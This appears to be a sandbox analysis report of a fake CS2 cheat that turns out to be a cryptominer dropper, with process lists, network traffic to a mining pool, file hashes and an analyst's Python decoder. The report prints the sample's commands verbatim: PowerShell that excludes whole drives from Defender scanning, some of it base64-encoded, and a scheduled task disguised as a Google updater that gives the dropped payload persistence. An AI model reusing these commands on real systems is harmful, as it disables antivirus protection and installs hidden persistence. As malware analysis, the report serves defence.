C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s CDPSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\ApplicationFrameHost.exe

C:\Windows\system32\ApplicationFrameHost.exe -Embedding

C:\Windows\System32\InstallAgent.exe

C:\Windows\System32\InstallAgent.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Users\Admin\AppData\Local\Temp\cs2.exe

"C:\Users\Admin\AppData\Local\Temp\cs2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbQBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAdgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAZwBiACMAPgA="

C:\Users\Admin\AppData\Local\conhost32.exe

"C:\Users\Admin\AppData\Local\conhost32.exe"

C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe

"C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jdikcdmvr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Google\Chrome\updater.exe

C:\Users\Admin\Google\Chrome\updater.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jdikcdmvr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe
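
The first powershell.exe in the list above carries its script as -EncodedCommand, while the later calls pass Add-MpPreference in clear text. The script below is an added example, not sandbox output, that decodes the encoded form (base64 over UTF-16LE, not UTF-8), strips the <#...#> block comments the sample sprinkles in as junk tokens, and unions the -ExclusionPath arguments of both invocations so the full set of directories the sample carved out of Defender scanning is visible in one place. Both command strings are copied from the process list; the regexes assume the @(...) array form used here.

```python
import base64
import re

# Copied from the process list above: the -EncodedCommand argument of the first
# powershell.exe launched by cs2.exe, and the second, unencoded Add-MpPreference call.
ENCODED = (
    "PAAjAGsAaQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbQBiACMAPgAgAC0A"
    "RQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwA"
    "JABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAdgBjACMAPgAgAC0ARgBvAHIAYwBlACAA"
    "PAAjAHoAZwBiACMAPgA="
)
PLAINTEXT = "Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force"

# PowerShell block comments; the sample uses them purely as filler between tokens.
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.S)


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE; decoding as UTF-8 gives NUL-padded junk."""
    return base64.b64decode(b64).decode("utf-16-le")


def deobfuscate(script: str) -> str:
    """Drop block comments and collapse whitespace so the real command line stands out."""
    return " ".join(BLOCK_COMMENT.sub(" ", script).split())


def exclusion_paths(script: str) -> list[str]:
    """Pull the array passed to -ExclusionPath (the @(...) form used in this sample)."""
    m = re.search(r"-ExclusionPath\s+@\((.*?)\)", script)
    return [p.strip() for p in m.group(1).split(",")] if m else []


def excluded_roots(*scripts: str) -> set[str]:
    """Union of every exclusion root across all invocations, encoded or not."""
    roots: set[str] = set()
    for s in scripts:
        roots.update(exclusion_paths(deobfuscate(s)))
    return roots


if __name__ == "__main__":
    decoded = decode_encoded_command(ENCODED)
    print("raw:      ", decoded)
    print("cleaned:  ", deobfuscate(decoded))
    print("excluded: ", sorted(excluded_roots(decoded, PLAINTEXT)))
```

The encoded call differs from the clear-text one in its second exclusion: it excludes $env:SystemDrive, which on a default install is the whole of C:, rather than $env:ProgramFiles. Between the two calls the sample asks Defender to skip the user profile, Program Files and the entire system drive before the dropped conhost32.exe and the updater.exe persistence payload run. On a suspect host, Get-MpPreference | Select-Object -ExpandProperty ExclusionPath shows whether either call took effect.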

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:5555 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
DE 95.179.241.203:5555 pool.hashvault.pro tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\conhost32.exe

MD5 0ca285f9a8c43016ffe109a13b0e07a0
SHA1 a03f79912ab0fbfd10ee3ff67bff60671a8ad42f
SHA256 880123a7fac24705ffb6795713d32fdc21679ac00802e72cb54d86814be4fcf1
SHA512 b68ee3e6b8499ca4995390d8c614784d13629a326bbac0c9d258813723428cbd830021e68bd78f7ca7d8330c0eeb1b28405f29bb967349a205c98973086ef883

C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe

MD5 dfae04e92d343bd110609b8194816131
SHA1 d1b1f02cb02273f56eef010a52072f6c6a23f071
SHA256 807999620cb4783d5c8f282cc21a6c5829e9f99719cbcdb7a71bdacd58671daa
SHA512 6083ae949fef7c09102ac2d1fd6da30ec38b6044a9fe258a64ec07178cf5a180158a0fda32f76b76d14cff6653a8a17f8a5f15c747625be4a42fe015f48dc2fe

memory/804-8-0x000000007261E000-0x000000007261F000-memory.dmp

memory/804-13-0x0000000001180000-0x00000000011B6000-memory.dmp

memory/804-15-0x0000000007150000-0x0000000007778000-memory.dmp

memory/804-14-0x0000000072610000-0x0000000072CFE000-memory.dmp

memory/804-16-0x0000000007020000-0x0000000007042000-memory.dmp

memory/804-17-0x00000000078F0000-0x0000000007956000-memory.dmp

memory/804-18-0x0000000007960000-0x00000000079C6000-memory.dmp

memory/804-21-0x0000000007AC0000-0x0000000007E10000-memory.dmp

memory/804-25-0x0000000007880000-0x000000000789C000-memory.dmp

memory/804-26-0x0000000008090000-0x00000000080DB000-memory.dmp

memory/804-30-0x00000000081D0000-0x0000000008246000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqv544na.qto.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/804-56-0x0000000009190000-0x00000000091AE000-memory.dmp

memory/804-61-0x0000000009210000-0x00000000092B5000-memory.dmp

memory/804-55-0x0000000073000000-0x000000007304B000-memory.dmp

memory/804-54-0x00000000091D0000-0x0000000009203000-memory.dmp

memory/804-62-0x00000000094C0000-0x0000000009554000-memory.dmp

memory/804-260-0x0000000009460000-0x000000000947A000-memory.dmp

memory/804-265-0x0000000009450000-0x0000000009458000-memory.dmp

memory/804-281-0x0000000072610000-0x0000000072CFE000-memory.dmp

memory/2948-282-0x00007FF73C9A0000-0x00007FF73CF5C000-memory.dmp

memory/4432-288-0x0000022449350000-0x0000022449372000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 84b947076ff79194bd2f2539c80d2fac
SHA1 154b54aa34a1521d59d373bae20197426707d285
SHA256 858af83202a048447e425f4d815fd8faadbe060aa0777c0c1743f577f7b9ff92
SHA512 dd42a4187f5e806690aeb2f49734da7199e09f92f07125dd9b26aa2da2b8bb3b74db2b2fe3d2a83f75ab900731a1a1bc808923df80b1e239cd43b841499f701f

memory/4432-291-0x0000022449500000-0x0000022449576000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4e36cd1fa1e00c532cb82880a8a6097d
SHA1 2d5a84ef221b0d5637fb854f68eef69d36065c15
SHA256 f55e8fb411153ce462b5e7cbe4c2e362bb4a73dcaff6e2905aea6eab5a4fb8ca
SHA512 4910cec0f2ea8c9b1490fa1d95369d97bf8ff80840454ecea0ed50d9427a421fdb5bc914c86a05f92574211a4c7a3f429acbfd950c6d8411ef6fa31fabd2a2e6

memory/3456-331-0x00007FFFED230000-0x00007FFFED2DE000-memory.dmp

memory/3456-330-0x00007FFFEFCB0000-0x00007FFFEFE8B000-memory.dmp

memory/640-346-0x00007FFFAFD40000-0x00007FFFAFD50000-memory.dmp

memory/1008-363-0x000002724A5C0000-0x000002724A5E7000-memory.dmp

memory/736-402-0x00007FFFAFD40000-0x00007FFFAFD50000-memory.dmp

memory/736-400-0x000002AE84820000-0x000002AE84847000-memory.dmp

memory/1008-364-0x00007FFFAFD40000-0x00007FFFAFD50000-memory.dmp

memory/640-345-0x0000021429E40000-0x0000021429E67000-memory.dmp

memory/584-343-0x0000014C6CE40000-0x0000014C6CE61000-memory.dmp

memory/584-342-0x00007FFFAFD40000-0x00007FFFAFD50000-memory.dmp

memory/584-341-0x0000014C6D230000-0x0000014C6D257000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1d2d913c3dc74c96a90c5f53810a4258
SHA1 2ec54878f305c68ff23a03c612563267704db95e
SHA256 54d6b3b1c9dc258b5ffcdb51148e5c31131d5824d8ce43b78998c3a812b965e9
SHA512 8a93c9b24aad835b7a10d8b511b5a8c07f19bcc426b1c15f1b5643822ccc1bdd045e2ea8fd3e5094c00320b9fe45b3cc70700e155992aaca4093c81e349e6853

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bbb673277fae96ee4bc299672085e949
SHA1 731ccb1581a06bff2ca36ca46b20c91c9adc468c
SHA256 21a0a3c47eb15cec5d37688a67369836fda0164d0cd5afaa9a2aa52fb838685d
SHA512 aa0efc1683991ed68027f0fbd1dfcf0616dd0c328bd015cb43987411e454e0583e8cc1a45bc9f689e873007071e0923d9be10a6db689ba268a167f856b6a8425